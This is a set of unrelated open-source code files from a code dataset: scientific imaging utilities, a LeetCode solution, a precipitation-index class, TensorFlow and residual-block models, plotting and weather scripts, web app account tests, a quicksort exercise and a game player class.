stack as a video file (better compression than gifs)\n Args:\n -----\n filename (str): path to savefile\n image_stack (np.ndarray): image stack in [z/t,x,y,c] format\n codec (str): opencv fourcc compatible codec, 4 char long str\n \"\"\"\n \n fourcc = VideoWriter_fourcc(*codec)\n out = VideoWriter(filename, fourcc, fps, image_stack.shape[1:3][::-1], **kwargs)\n\n # Rescale for video compatible format\n if not image_stack.dtype is np.uint8:\n image_stack = ((image_stack-image_stack.min()) / (image_stack.max()-image_stack.min()) *255).astype('uint8')\n # image_stack = np.clip(image_stack *255, 0,255).astype('uint8')\n\n for i in range(image_stack.shape[0]):\n if image_stack.shape[-1] == 1:\n out.write(cvtColor(image_stack[i], COLOR_GRAY2RGB))\n\n elif image_stack.shape[-1] == 3:\n out.write(image_stack[i])\n\n else:\n raise ValueError(f\"Wrong number of channels for frame, should be 1 or 3, is {image_stack[i].shape[-1]}\")\n\n out.release()\n\n\ndef timeit(func):\n \"\"\"Decorator to monitor computing time\"\"\"\n\n f_name = ' '.join(func.__name__.split('_'))\n\n def timeit_wrapper(*args, **kwargs):\n start_time = time.time()\n print(f'Starting {f_name}...', end='', flush=True)\n return_values = func(*args, **kwargs)\n print(f\"\\tDone! (took {time.time()-start_time:.2f}s)\", flush=True)\n \n return return_values\n\n return timeit_wrapper\n \n\n#TODO: unit test for _nat_sort\ndef _nat_sort(path):\n \"\"\"Natural sorting of paths, [0,1,10,2] -> [0,1,2,10]\"\"\"\n if isinstance(path, PurePath):\n return [int(c) if c.isdigit() else c for c in re.split(\"([0-9]+)\", path.as_posix())]\n \n return [int(c) if c.isdigit() else c for c in re.split(\"([0-9]+)\", path)]\n\n\ndef load_walnut_ds():\n\n ds_path = '/data/fdelberghe/FastWalnuts2/'\n walnut_folders = [folder for folder in sorted(os.listdir(ds_path), key=_nat_sort) \n if os.path.isdir(os.path.join(ds_path, folder))]\n\n walnuts_agd_paths = [sorted(glob.glob(os.path.join(ds_path + f\"{folder}/agd_*.tif\")), key=_nat_sort) \n for folder in walnut_folders]\n walnuts_fdk_paths = [\n [sorted(glob.glob(os.path.join(ds_path + f\"{folder}/fdk_orbit{orbit_id:02d}*.tif\")),\n key=_nat_sort) for orbit_id in [1,2,3]] for folder in walnut_folders]\n\n return walnuts_agd_paths, walnuts_fdk_paths\n\n\ndef load_foam_phantom_ds():\n\n ds_path = '/data/fdelberghe/FoamPhantoms/'\n phantom_folders = [folder for folder in sorted(os.listdir(ds_path), key=_nat_sort) \n if os.path.isdir(os.path.join(ds_path, folder))]\n\n phantom_agd_paths = [\n sorted(glob.glob(os.path.join(ds_path + f\"{folder}/phantom_true_*.tif\")), key=_nat_sort)\n for folder in phantom_folders]\n\n phantom_fdk_paths = [\n [sorted(glob.glob(os.path.join(ds_path + f\"{folder}/phantom_fdk_*_o{orbit_id}*.tif\")), key=_nat_sort)\n for orbit_id in [1,2,3]] for folder in phantom_folders]\n\n return phantom_agd_paths, phantom_fdk_paths\n\n\ndef load_phantom_ds(folder_path='PhantomsRadial/'):\n\n ds_path = Path('/data/fdelberghe/') /folder_path\n\n phatom_folders = sorted(ds_path.glob('*/'), key=_nat_sort)\n\n phantom_truth_paths = [sorted(folder.glob('CT_target_*.tif'), key=_nat_sort) for folder in phatom_folders]\n phantom_fdk_paths = [[sorted(folder.glob(f'CB_source_orbit{orbit_id:0>2d}_*.tif'), key=_nat_sort)\n for orbit_id in [1,2,3]] for folder in phatom_folders]\n\n return phantom_truth_paths, phantom_fdk_paths\n\n\ndef set_seed(func):\n \"\"\"Decorator to set random seed before function calls for deterministic behavior\"\"\"\n\n def _set_seed_wrapper(*args, seed=0, **kwargs):\n 
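# fix the global random state up front so every call with the same seed shuffles identically\n        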
random.seed(seed)\n        return func(*args, **kwargs)\n    \n    return _set_seed_wrapper\n\n@set_seed\ndef split_data(input_ims, target_ims, frac=7/42, verbose=True):\n    \"\"\"Splits data into train, val and test sets, as list(tuple(input, target))\"\"\"\n\n    n_test = n_val = max(1, int(np.round(len(target_ims) *frac)))\n    \n    # shuffle order of (input, target) pairs\n    zipped_ims = random.sample([\n        (i, input_im, target_im) for i, (input_im, target_im) in enumerate(zip(input_ims, target_ims))\n    ], len(target_ims))\n\n    ids_te, *test_set = tuple(zip(*zipped_ims[:n_test]))\n    ids_val, *val_set = tuple(zip(*zipped_ims[n_test:n_test+n_val]))\n    ids_tr, *train_set = tuple(zip(*zipped_ims[n_test+n_val:]))\n\n    if verbose:\n        print(f\"Sample indices for test: {ids_te}, validation: {ids_val}, training: {ids_tr}\")\n\n    return test_set, val_set, train_set\n\n@set_seed\ndef split_data_CV(input_ims, target_ims, frac=1/4, verbose=True):\n    \"\"\"Creates a generator for data split for cross validation, yields train, val and test sets, as list(tuple(input, target))\"\"\"\n    \n    if isinstance(frac, (tuple, list)):\n        n_test = int(np.round(len(target_ims) *frac[0]))\n        n_val = max(1, int(np.round(len(target_ims) *frac[1])))\n\n    else:\n        n_test = n_val = max(1, int(np.round(len(target_ims) *frac)))\n\n    # shuffle order of (input, target) pairs\n    zipped_ims = random.sample([\n        (i, input_im, target_im) for i, (input_im, target_im) in enumerate(zip(input_ims, target_ims))\n    ], len(target_ims))\n\n    if n_test <= 0:\n        ids_te, test_set = None, None\n    else:\n        ids_te, *test_set = tuple(zip(*zipped_ims[:n_test]))\n        zipped_ims = zipped_ims[n_test:]\n\n    for i in range(len(zipped_ims)):\n        val_idx = set([(j+i) %len(zipped_ims) for j in range(n_val)])\n        tr_idx = set(range(len(zipped_ims))) -val_idx\n\n        ids_val, *val_set = tuple(zip(*[zipped_ims[j] for j in val_idx]))\n        ids_tr, *train_set = tuple(zip(*[zipped_ims[j] for j in tr_idx]))\n\n        if verbose:\n            print(f\"Sample indices for test: {ids_te}, validation: {ids_val}, training: {ids_tr}\")\n\n        yield test_set, val_set, train_set\n","repo_name":"FlorianDelberghe/CBCT_artifact_reduction","sub_path":"src/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9327,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"7212502007","text":"# -*- coding: utf-8 -*-\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n\nclass Solution:\n    def isPalindrome(self, head: ListNode) -> bool:\n        fast = slow = head\n        while fast and fast.next:\n            fast = fast.next.next\n            slow = slow.next\n\n        if fast:\n            # odd number of nodes: skip the middle one\n            slow = slow.next\n\n        tail = self.reverseList(slow)\n        while head and tail:\n            if head.val != tail.val:\n                return False\n            head = head.next\n            tail = tail.next\n        return True\n\n    def reverseList(self, head: ListNode) -> ListNode:\n        \"\"\" Reverse the linked list \"\"\"\n        prev = None\n        while head:\n            tmp = head.next\n            head.next = prev\n            prev = head\n            head = tmp\n        return prev\n\n    def makeList(self, nums) -> ListNode:\n        head = ListNode()\n        cur = head\n        for n in nums:\n            cur.next = ListNode(n)\n            cur = cur.next\n        return head.next\n\n\nif __name__ == \"__main__\":\n    s = Solution()\n    l1 = s.makeList([1, 2, 3, 4, 5])\n    s.isPalindrome(l1)\n    l2 = s.makeList([1, 2, 3, 4])\n    
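# [1, 2, 3, 4]: the first half [1, 2] differs from the reversed second half [4, 3], so this call should return False\n    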
s.isPalindrome(l2)","repo_name":"HQ409/Leetcode","sub_path":"0234.palindrome-linked-list/python/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13375523172","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 23 13:38:35 2023\n\n@author: Gary\n\"\"\"\n\nimport numpy as np\nfrom scipy import stats as st\n\n\"\"\"\n# Standardized Index for SPI, SSI, SGI, etc.\n\"\"\"\n\nclass Standardized_Index:\n    def __init__(self, data,time):\n        # rolling moving average\n        data_ma = data.rolling(time,center=False).mean() # rolling computes over a window of length time\n\n        # natural log of the moving average\n        data_log = np.log(data_ma + 1e-5) # the 1e-5 offset keeps zeros finite under the log\n        data_log[ np.isinf(data_log) == True] = np.nan # set infs to NaN, since log(0) is undefined and would raise errors\n        \n        # mean of all the moving averages, ignoring NaN\n        mu_data_ma = np.nanmean((data_ma))\n        \n        # sum of the log moving averages\n        sum_log = np.nansum(data_log)\n\n        # estimate the Gamma distribution parameters\n        n = len(data_log[time-1:]) # sample size\n        A = np.log(mu_data_ma + 1e-5) - (sum_log/n) # compute A\n        alpha = (1/(4*A))*(1+(1+((4*A)/3))**0.5) # compute alpha (shape a)\n        beta = mu_data_ma/alpha # compute beta (scale)\n        \n        # cumulative distribution function (CDF) of the fitted Gamma distribution\n        gamma = st.gamma.cdf(data_ma + 1e-5, a=alpha, scale=beta)\n        \n        # then transform to the standard normal distribution (inverse of CDF)\n        # Percent point function (inverse of cdf — percentiles).\n        norm_spi = st.norm.ppf(gamma, loc=0, scale=1) # ppf inverts the CDF; loc is the mean, scale the standard deviation\n        \n        self.moving_averaged_data = data_ma\n        self.natural_log_of_moving_averaged_data = data_log\n        self.mean_of_moving_averaged_data = mu_data_ma\n        self.sum_of_natural_log = sum_log\n        self.count_of_moving_averaged_data = n\n        self.A = A\n        self.alpha = alpha\n        self.beta = beta\n        self.gamma_distribution = gamma\n        self.spi = norm_spi\n","repo_name":"weegary/spi","sub_path":"SPI.py","file_name":"SPI.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"631688517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 24 15:57:02 2019\n\n@author: Wei-Hsiang, Shen\n\"\"\"\n\nimport tensorflow as tf\nimport tensorflow.keras.layers as layers\n\n\ndef Get_Model():\n    inputs_stamp_image = tf.keras.Input(shape=(50,50,3), name='stamp_img')\n    inputs_address = tf.keras.Input(shape=(None,), name='address')\n    inputs_color = tf.keras.Input(shape=(4,), name='color') # categorical inputs should be one-hot coded\n\n    # Stamp (images data)\n    features_stamp = layers.Conv2D(8,3)(inputs_stamp_image)\n    features_stamp = layers.MaxPool2D()(features_stamp)\n    features_stamp = layers.Flatten()(features_stamp)\n\n    # Address (sequence data)\n    num_words = 10000\n    features_address = layers.Embedding(num_words, 64)(inputs_address)\n    features_address = layers.LSTM(128)(features_address)\n\n    # Color (tabular data)\n    features_color = layers.Dense(10)(inputs_color)\n\n    # Merge all features into a single vector via concatenation\n    features_all = tf.concat([features_stamp, features_address, features_color], axis=-1)\n\n    # Predict price\n    price_prediction = layers.Dense(10)(features_all)\n    price_prediction = layers.Dense(1, activation='relu', name='price')(price_prediction)\n\n    # Predict class\n    class_prediction = layers.Dense(20)(features_all)\n    class_prediction = layers.Dense(10, activation='softmax', name='class')(class_prediction)\n\n    # Instantiate an end-to-end model predicting both price and class\n    model = tf.keras.Model(inputs=[inputs_stamp_image, inputs_address, 
inputs_color],\n outputs=[price_prediction, class_prediction])\n\n return model\n\nif __name__ == '__main__':\n model = Get_Model()\n model.summary()\n tf.keras.utils.plot_model(model, 'Post_Office_Network.png', show_shapes=True)\n\n # We can assign different loss to each output, and also different weights to each loss\n model.compile(optimizer=tf.keras.optimizers.RMSprop(1e-3),\n loss={'price': 'mse', # specified by output name\n 'class': 'categorical_crossentropy'},\n loss_weights=[1., 0.2])\n\n\n\n\n\n","repo_name":"Rabbit1010/TensorFlow2.0-Tutorial","sub_path":"Topic 2/ticket_system_example.py","file_name":"ticket_system_example.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5633259497","text":"import numpy as np\nimport tajava.reader.fd.sdrecon_signal\nimport tajava.reader.fd.hybridrecon\nimport plotly.express as px\nimport plotly.graph_objs as go\nimport pathlib\nimport numpy_utility as npu\n\n\ncoordinate_path = pathlib.Path(__file__).resolve().parent / \"coordinate\"\n\nsd_positions = npu.to_tidy_data({\n \"TALE SD\": np.loadtxt(coordinate_path / \"talesd.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")]),\n \"NICHE\": np.loadtxt(coordinate_path / \"niche.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")]),\n \"TA SD\": np.loadtxt(coordinate_path / \"tasd.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")]),\n}, \"SD Type\", (\"lid\", \"x\", \"y\", \"z\"))\nsd_positions[\"x\"] *= 1e-3\nsd_positions[\"y\"] *= 1e-3\n\nmd_tale_fd_pos = np.loadtxt(coordinate_path / \"MD-TALE_site.dat\", dtype=[(\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")])\nmd_tower_pos = np.loadtxt(coordinate_path / \"mdtower.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")])\nmd_tower_pos[\"x\"] *= 1e-3\nmd_tower_pos[\"y\"] *= 1e-3\n\n\ndef _plot(sdrecon_signal, hybridrecon_data, auto_open, show_id=False):\n fig = px.scatter(\n sd_positions, x=\"x\", y=\"y\", text=\"lid\", color=\"SD Type\",\n labels={\"x\": \"X (West to East)\", \"y\": \"Y (South to North)\", \"lid\": \"SD ID\"},\n color_discrete_sequence=[\"#666666\"]\n )\n if show_id == np.False_:\n fig.update_traces(mode=\"markers\")\n fig.update_traces(marker_symbol=\"square-open\")\n fig.update_traces(marker_size=10, selector=dict(name=\"NICHE\"))\n fig.update_traces(marker_size=12, selector=dict(name=\"TALE SD\"))\n fig.update_traces(marker_size=14, selector=dict(name=\"TA SD\"))\n fig.update_xaxes(scaleanchor=\"y\", scaleratio=1, constrain=\"domain\", ticksuffix=\" km\")\n fig.update_yaxes(ticksuffix=\" km\")\n\n fig.add_trace(\n go.Scatter(\n name=\"MD-TALE FD\",\n text=\"MD-TALE FD\",\n mode=\"markers+text\",\n x=md_tale_fd_pos[\"x\"], y=md_tale_fd_pos[\"y\"],\n marker=dict(symbol=\"star\", size=15, line_width=0, color=\"#666666\"),\n textposition=\"middle left\"\n )\n )\n\n fig.add_trace(\n go.Scattergl(\n name=\"Hit Detectors\",\n mode=\"markers\",\n x=sdrecon_signal[\"x\"] * 1e-5,\n y=sdrecon_signal[\"y\"] * 1e-5,\n marker=dict(\n line_width=0,\n color=(sdrecon_signal[\"t\"] - sdrecon_signal[\"t\"].min()) * 1000,\n colorbar=dict(\n title=\"Time [ns]\"\n ),\n colorscale=\"Portland\",\n sizemode=\"area\",\n size=sdrecon_signal[\"Q\"],\n sizeref=2 * sdrecon_signal[\"Q\"].max() / (20 ** 2),\n # sizemin=5,\n opacity=1\n ),\n # hovertemplate=get_hover_template(npe=True, t=True)\n )\n )\n\n for hybridrecon_row in 
hybridrecon_data:\n azimuth = np.deg2rad(180 - (hybridrecon_row[\"azimuth\"] - 90))\n arrow = 0.2 * np.array([np.cos(azimuth), np.sin(azimuth)])\n arrow_perp = 0.1 * np.array([np.cos(azimuth + np.pi/2), np.sin(azimuth + np.pi/2)])\n\n color = \"magenta\" if hybridrecon_row[\"is_true\"] else \"black\"\n\n fig.add_trace(\n go.Scattergl(\n name=\"{} Core Position\".format(\"True\" if hybridrecon_row[\"is_true\"] else \"Reconstructed\"),\n x=[hybridrecon_row[\"x\"]], y=[hybridrecon_row[\"y\"]],\n marker_color=color,\n opacity=0\n )\n )\n add_arrow_shape(\n fig,\n x0=hybridrecon_row[\"x\"] - arrow[0] * 0.5, x1=hybridrecon_row[\"x\"] + arrow[0] * 0.5,\n y0=hybridrecon_row[\"y\"] - arrow[1] * 0.5, y1=hybridrecon_row[\"y\"] + arrow[1] * 0.5,\n line=dict(color=color, width=3)\n )\n fig.add_shape(\n type=\"line\",\n x0=hybridrecon_row[\"x\"] - arrow_perp[0] * 0.5, x1=hybridrecon_row[\"x\"] + arrow_perp[0] * 0.5,\n y0=hybridrecon_row[\"y\"] - arrow_perp[1] * 0.5, y1=hybridrecon_row[\"y\"] + arrow_perp[1] * 0.5,\n line=dict(color=color, width=3)\n )\n\n fig.update_traces(showlegend=False)\n fig.update_xaxes(range=(-8, -6))\n fig.update_yaxes(range=(17.75, 19.75))\n\n traces = [trace for trace in fig.data if len(trace.marker.colorbar.to_plotly_json()) > 0]\n fig.layout.xaxis.domain = (0, 1 - 0.1 * len(traces))\n for i, trace in enumerate(traces):\n trace.marker.colorbar.x = 1 - 0.1 * i\n trace.marker.colorbar.y = 0.5\n trace.marker.colorbar.xanchor = \"center\"\n trace.marker.colorbar.yanchor = \"middle\"\n\n if auto_open:\n fig.show()\n\n return fig\n\n\ndef add_arrow_shape(fig, x0, y0, x1, y1, **kwargs):\n theta = np.arctan2(y1 - y0, x1 - x0)\n arrow_length = np.sqrt((x1 - x0) ** 2 + (y1 - y0) ** 2)\n right_arrow = -0.25 * arrow_length * np.array([np.cos(theta - np.deg2rad(30)), np.sin(theta - np.deg2rad(50))])\n left_arrow = -0.25 * arrow_length * np.array([np.cos(theta + np.deg2rad(30)), np.sin(theta + np.deg2rad(50))])\n\n fig.add_shape(\n type=\"line\",\n x0=x0, y0=y0, x1=x1, y1=y1,\n editable=False,\n **kwargs\n )\n fig.add_shape(\n type=\"line\",\n x0=x1, y0=y1, x1=x1 + right_arrow[0], y1=y1 + right_arrow[1],\n editable=False,\n **kwargs\n )\n fig.add_shape(\n type=\"line\",\n x0=x1, y0=y1, x1=x1 + left_arrow[0], y1=y1 + left_arrow[1],\n editable=False,\n **kwargs\n )\n","repo_name":"yomura-yomura/ta-java-output-reader","sub_path":"tajava/plot/fd/signal_map.py","file_name":"signal_map.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7049156962","text":"__author__ = \"Christian Kongsgaard\"\n__license__ = \"GNU GPLv3\"\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Imports\n\n\n# Module imports\nimport os\nimport typing\n\n# Weather imports\nfrom weather_visualizer import visualization\nfrom weather_visualizer import report\n\n# -------------------------------------------------------------------------------------------------------------------- #\n#\n\n\ndef main(config: dict):\n\n weather_file = config['epw']\n out_path = config['out']\n\n try:\n if config['report']:\n report.simple_report(weather_file, out_path)\n except KeyError:\n pass\n\n try:\n if config['figures']:\n if isinstance(config['figures'], list):\n for element in config['figures']:\n visualization.save_figure(weather_file, out_path, element, 'yearly')\n\n elif isinstance(config['figures'], dict):\n\n for key in config['figures'].keys():\n if 
isinstance(config['figures'][key], str):\n visualization.save_figure(weather_file, out_path, key, config['figures'][key])\n\n elif isinstance(config['figures'][key], list):\n\n for element in config['figures'][key]:\n visualization.save_figure(weather_file, out_path, key, element)\n\n elif isinstance(config['figures'][key], dict):\n for subkey in config['figures'][key].keys():\n\n try:\n size = config['figures'][key][subkey]['size']\n except KeyError:\n size = None\n\n try:\n colors = config['figures'][key][subkey]['colors']\n except KeyError:\n colors = None\n\n try:\n ylim = config['figures'][key][subkey]['limits']['y']\n except KeyError:\n ylim = None\n\n try:\n xlim = config['figures'][key][subkey]['limits']['x']\n except KeyError:\n xlim = None\n\n visualization.save_figure(weather_file, out_path, key, subkey, size, colors, xlim, ylim)\n else:\n raise KeyError(f'{config[\"figures\"][key]} is not supported in figures')\n else:\n raise KeyError(f'{config[\"figures\"]} with type {type(config[\"figures\"])} is not supported for figures.')\n except KeyError:\n pass","repo_name":"ocni-dtu/weather_visualizer","sub_path":"weather_visualizer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"671815249","text":"from pydl.nn.layers import Layer\nfrom pydl.nn.activations import Linear\nfrom pydl.nn.activations import Sigmoid\nfrom pydl.nn.activations import Tanh\nfrom pydl.nn.activations import SoftMax\nfrom pydl.nn.activations import ReLU\nfrom pydl.nn.conv import Conv\n\nactivations = {'linear': Linear,\n 'sigmoid': Sigmoid,\n 'tanh': Tanh,\n 'softmax': SoftMax,\n 'relu': ReLU\n }\n\n\nclass ResidualBlock(Layer):\n \"\"\"The Residual Block Class.\"\"\"\n\n def __init__(self, skip_connect, conv_layers, activation_fn='ReLU', name='Res_Block'):\n super().__init__(name=name)\n self._type = 'Res_Block'\n self._skip_connect = skip_connect\n self._block_layers = conv_layers\n self._block_out_activation_fn = activations[activation_fn.lower()]()\n\n self._block_layers[-1].activation = 'Linear'\n\n skip_size = self._skip_connect.shape[1:]\n block_out_shape = self._block_layers[-1].shape[1:]\n\n if skip_size != block_out_shape:\n self._skip_convolution = \\\n Conv(self._skip_connect, receptive_field=(1, 1), num_filters=block_out_shape[0],\n zero_padding=0, stride=self._block_layers[0].stride, name='Skip_Conv',\n weight_scale=1.0, xavier=True, activation_fn='Linear', batchnorm=True,\n force_adjust_output_shape=True)\n else:\n self._skip_convolution = None\n\n # Getters\n # -------\n @property\n def shape(self):\n # (None, num_filters, output_height, output_width) of the last (convolution) layer\n return self._block_layers[-1].shape\n\n @property\n def layers(self):\n return self._block_layers\n\n @property\n def skip_convolution(self):\n return self._skip_convolution\n\n def forward(self, inputs, inference=None, mask=None, temperature=1.0):\n layer_inp = inputs\n for layer in self._block_layers:\n layer_out = layer.forward(layer_inp, inference=inference)\n layer_inp = layer_out\n\n if self._skip_convolution is not None:\n skip_input = self._skip_convolution.forward(inputs, inference=inference)\n else:\n skip_input = inputs\n\n block_out = self._block_out_activation_fn.forward(layer_out + skip_input)\n return block_out\n\n def backward(self, inp_grad, reg_lambda=0, inputs=None):\n if len(inp_grad.shape) > 2: # The proceeding layer is a Convolution/Pooling layer\n pass\n else: # 
The proceeding layer is a FC layer\n # Reshape incoming gradients accordingly\n inp_grad = inp_grad.reshape(-1, *self._out_shape[1:])\n\n # dy/dz: Gradient of the output of the layer w.r.t the logits 'z'\n block_out_activation_grad = self._block_out_activation_fn.backward(inp_grad)\n\n layer_inp_grad = block_out_activation_grad\n for layer in reversed(self._block_layers):\n layer_out_grad = layer.backward(layer_inp_grad, reg_lambda)\n layer_inp_grad = layer_out_grad\n\n if self._skip_convolution is not None:\n skip_grad = self._skip_convolution.backward(block_out_activation_grad, reg_lambda)\n else:\n skip_grad = block_out_activation_grad\n\n block_out_grad = layer_out_grad + skip_grad\n\n return block_out_grad\n\n def update_weights(self, alpha):\n pass\n","repo_name":"nash911/PyDL","sub_path":"pydl/nn/residual_block.py","file_name":"residual_block.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14334365692","text":"import pytest\nimport flask\nfrom datetime import datetime\nfrom models import CommitPost, Repo, Task\n\n\ndef test_csrf_is_checked(app, app_ctx, client):\n @app.route('/csrf', methods=('GET', 'POST'))\n def csrfed():\n return 'sup'\n\n no_csrf_resp = client.post('/csrf')\n assert no_csrf_resp.status_code == 400\n assert b'CSRF' in no_csrf_resp.data\n\n assert client.post('/csrf', data={'csrf_token': 'wrong'}).status_code == 400\n resp = client.post('/csrf', data={'csrf_token': client.generate_csrf()})\n assert resp.status_code == 200, resp.data\n\n\n@pytest.mark.parametrize(('account_path', 'unauth_status'), (\n ('/account', 401),\n ('/add', 401),\n ('/account/email/new', 401),\n ('/account/name', 401),\n ('/repo/hex/unpost', 401),\n ('/repo/hex/rerender', 401),\n))\ndef test_account_unauthed(login, gh_blogger, account_path, unauth_status):\n with login(gh_blogger) as client:\n client.get(account_path).status_code == unauth_status\n\n\ndef test_add_commit(app_ctx, fake_github, login, gh_blogger):\n sha = '050c55865e2bb1c96bf0910488d3d6d521eb8f4d'\n with fake_github(), login(gh_blogger) as client:\n # get dash with latest commits\n resp = client.get('/account')\n assert resp.status_code == 200\n assert b'test some account stuff' in resp.data\n assert sha.encode() in resp.data\n assert b'unpost' not in resp.data # fresh account, no posts yet\n\n # add the latest\n resp = client.get('/add', query_string={\n 'csrf_token': client.csrf_token,\n 'repo_name': 'uniphil/commit--blog',\n 'sha': sha,\n })\n assert resp.status_code == 302, resp.data\n resp = client.get(resp.headers['location'])\n assert resp.status_code == 200\n assert b'unpost' in resp.data\n\n post = CommitPost.query.filter(CommitPost.hex == sha).first()\n assert post is not None\n assert post.blogger is gh_blogger\n\n # also try unposting\n resp = client.post(f'/uniphil/commit--blog/{sha}/unpost', data={\n 'csrf_token': client.csrf_token,\n })\n assert resp.status_code == 302\n resp = client.get(resp.headers['location'])\n assert resp.status_code == 200\n assert b'Unposted commit' in resp.data\n\n post = CommitPost.query.filter(CommitPost.hex == sha).first()\n assert post is None\n\n\ndef test_add_gh_email(app_ctx, login, gh_blogger):\n with login(gh_blogger) as client:\n client.generate_csrf()\n no_email = client.post('/account/add-gh-email', data={\n 'add_email': '',\n 'csrf_token': client.csrf_token,\n })\n assert no_email.status_code == 400\n assert b'missing gh_email address' in no_email.data\n\n with 
client.session_transaction() as sess:\n sess['gh_email'] = 'jel@example.com'\n ok_email = client.post('/account/add-gh-email', data={\n 'add_email': '',\n 'csrf_token': client.csrf_token,\n })\n assert ok_email.status_code == 302\n assert '/account' in ok_email.headers['Location']\n\n email = gh_blogger.get_email()\n assert email is not None\n assert email.address == 'jel@example.com'\n assert email.confirmed is None\n\n email_confirms = Task.query \\\n .filter(Task.task == 'email') \\\n .filter(Task.creator == gh_blogger) \\\n .filter(Task.details['recipient'].as_string() == 'jel@example.com') \\\n .filter(Task.details['message'].as_string() == 'confirm_email')\n assert email_confirms.count() == 1, 'one email task should be created'\n\n\ndef test_add_email(app_ctx, login, gh_blogger):\n with login(gh_blogger) as client:\n client.get('/account/email/new')\n resp = client.post('/account/email/new', data={\n 'address': 'jol@commit--blog.com',\n 'csrf_token': client.csrf_token,\n })\n assert resp.status_code == 302\n assert '/account' in resp.headers['Location']\n\n email = gh_blogger.get_email()\n assert email is not None\n assert email.address == 'jol@commit--blog.com'\n assert email.confirmed is None\n\n email_confirms = Task.query \\\n .filter(Task.task == 'email') \\\n .filter(Task.creator == gh_blogger) \\\n .filter(Task.details['recipient'].as_string() == 'jol@commit--blog.com') \\\n .filter(Task.details['message'].as_string() == 'confirm_email')\n assert email_confirms.count() == 1, 'one email task should be created'\n\n # resend\n resp = client.post('/accounts/confirm-email/jol@commit--blog.com/resend', data={\n 'csrf_token': client.csrf_token,\n })\n assert resp.status_code == 302, resp.data\n assert '/account' in resp.headers['Location']\n\n email_confirms = Task.query \\\n .filter(Task.task == 'email') \\\n .filter(Task.creator == gh_blogger) \\\n .filter(Task.details['recipient'].as_string() == 'jol@commit--blog.com') \\\n .filter(Task.details['message'].as_string() == 'confirm_email')\n assert email_confirms.count() == 2, 'another email task should be created'\n\n # verify\n link = email_confirms.first().details['variables']['confirm_url']\n get_page = client.get(link)\n assert get_page.status_code == 200\n assert email.token.encode() in get_page.data\n resp = client.post('/account/confirm-email/jol@commit--blog.com', data={\n 'csrf_token': client.csrf_token,\n 'token': email.token,\n })\n assert resp.status_code == 302, resp.data\n assert '/account' in resp.headers['location']\n assert isinstance(email.confirmed, datetime) is True\n\n\ndef test_revoke_oauth(app_ctx, login, token_for, token_login, gh_blogger):\n with login(gh_blogger) as client:\n client.generate_csrf()\n\n # check that the auth grant is not initially listed in account settings\n resp = client.get('/account')\n assert resp.status_code == 200, resp.data\n assert b'This app can create, view, and update posts' not in resp.data\n\n # auth grant appears after token has been created\n token, _token_string = token_for(gh_blogger)\n resp = client.get('/account')\n assert b'This app can create, view, and update posts' in resp.data\n\n # submit the revocation\n resp = client.post('/account/oauth/revoke', data={\n 'csrf_token': client.csrf_token,\n 'token_id': token.id,\n })\n assert resp.status_code == 302\n resp = client.get(resp.headers['location'])\n assert resp.status_code == 200\n assert b'Access token revoked' in resp.data\n assert b'This app can create, view, and update posts' not in 
resp.data\n","repo_name":"uniphil/commit--blog","sub_path":"tests/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17261639742","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\n\ndef quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n lesser_arr, equal_arr, greater_arr = [], [], []\n for num in arr:\n if num < pivot:\n lesser_arr.append(num)\n elif num > pivot:\n greater_arr.append(num)\n else:\n equal_arr.append(num)\n return quick_sort(lesser_arr) + equal_arr + quick_sort(greater_arr)\n\n\nfor tc in range(1, T+1):\n n = int(input())\n li = list(map(int, input().split()))\n print(\"#{} {}\".format(tc, quick_sort(li)[n//2]))","repo_name":"Gwanghun-Im/algorithm_study","sub_path":"5205_퀵정렬/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74156528485","text":"from player import Player\nfrom time import sleep\nfrom gesture import Gesture\n\nclass Human(Player):\n def __init__(self, name):\n super().__init__()\n self.type = 'human'\n self.name = name\n\n def display_gestures(self):\n counter = 0\n print(f'{self.name}, choose between these options: ')\n for gesture in self.gestures:\n print(f'Choose {str(counter)} for {gesture}')\n sleep(1)\n counter += 1\n\n\n def gesture_update(self):\n self.display_gestures()\n self.gesture = Gesture()\n self.choice_of_gesture = self.gesture.pick_gesture()","repo_name":"Jdrive5/Rock-Paper-Scissors-Lizard-Spock","sub_path":"Rock, Paper, Scissors, Lizard, 